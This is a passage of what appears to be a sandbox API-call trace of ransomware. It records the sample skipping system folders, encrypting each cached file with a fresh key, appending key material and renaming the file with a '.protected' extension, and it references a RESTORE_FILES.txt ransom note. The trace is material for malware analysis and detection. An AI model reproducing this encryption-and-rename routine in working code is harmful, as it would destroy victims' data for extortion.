(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 151 [0088.307] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".zip") returned 0x0 [0088.307] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.367] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.367] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.368] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.368] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.368] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.368] CloseHandle (hObject=0x150) returned 1 [0088.368] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.protected") returned 161 [0088.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6.protected")) returned 1 [0088.369] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.369] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="Windows") returned -1 [0088.369] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="Program Files") returned -1 [0088.369] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="Program Files (x86)") returned -1 [0088.369] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="$Recycle.bin") returned 1 [0088.369] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="System Volume Information") returned -1 [0088.369] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 151 [0088.369] StrStrIW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".protected") returned 0x0 [0088.369] lstrcmpW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="RESTORE_FILES.txt") returned -1 [0088.369] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.370] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 151 [0088.370] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".txt") returned 0x0 [0088.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 151 [0088.370] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".rar") returned 0x0 [0088.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 151 [0088.370] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".zip") returned 0x0 [0088.370] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.402] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.402] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.402] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.402] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.403] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.403] CloseHandle (hObject=0x150) returned 1 [0088.403] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.protected") returned 161 [0088.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd.protected")) returned 1 [0088.404] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.404] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="Windows") returned -1 [0088.404] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="Program Files") returned -1 [0088.404] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="Program Files (x86)") returned -1 [0088.404] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="$Recycle.bin") returned 1 [0088.404] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="System Volume Information") returned -1 [0088.404] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 151 [0088.404] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".protected") returned 0x0 [0088.404] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="RESTORE_FILES.txt") returned -1 [0088.405] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.405] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.407] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 151 [0088.407] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".txt") returned 0x0 [0088.407] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 151 [0088.407] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".rar") returned 0x0 [0088.407] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 151 [0088.407] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".zip") returned 0x0 [0088.407] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.412] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.412] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.413] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.413] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.413] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.413] CloseHandle (hObject=0x150) returned 1 [0088.413] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.protected") returned 161 [0088.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0.protected")) returned 1 [0088.414] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.414] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="Windows") returned -1 [0088.414] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="Program Files") returned -1 [0088.414] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="Program Files (x86)") returned -1 [0088.414] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="$Recycle.bin") returned 1 [0088.414] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="System Volume Information") returned -1 [0088.414] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 151 [0088.414] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".protected") returned 0x0 [0088.414] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="RESTORE_FILES.txt") returned -1 [0088.414] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.414] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 151 [0088.416] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".txt") returned 0x0 [0088.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 151 [0088.416] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".rar") returned 0x0 [0088.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 151 [0088.416] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".zip") returned 0x0 [0088.416] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.420] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.420] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.420] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.420] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.420] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.421] CloseHandle (hObject=0x150) returned 1 [0088.421] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.protected") returned 161 [0088.421] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e.protected")) returned 1 [0088.425] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.425] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="Windows") returned -1 [0088.425] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="Program Files") returned -1 [0088.425] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="Program Files (x86)") returned -1 [0088.425] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="$Recycle.bin") returned 1 [0088.425] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="System Volume Information") returned -1 [0088.425] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 151 [0088.425] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".protected") returned 0x0 [0088.425] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="RESTORE_FILES.txt") returned -1 [0088.425] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.425] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 151 [0088.430] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".txt") returned 0x0 [0088.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 151 [0088.430] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".rar") returned 0x0 [0088.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 151 [0088.430] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".zip") returned 0x0 [0088.430] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.431] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.431] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.431] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.431] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.431] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: 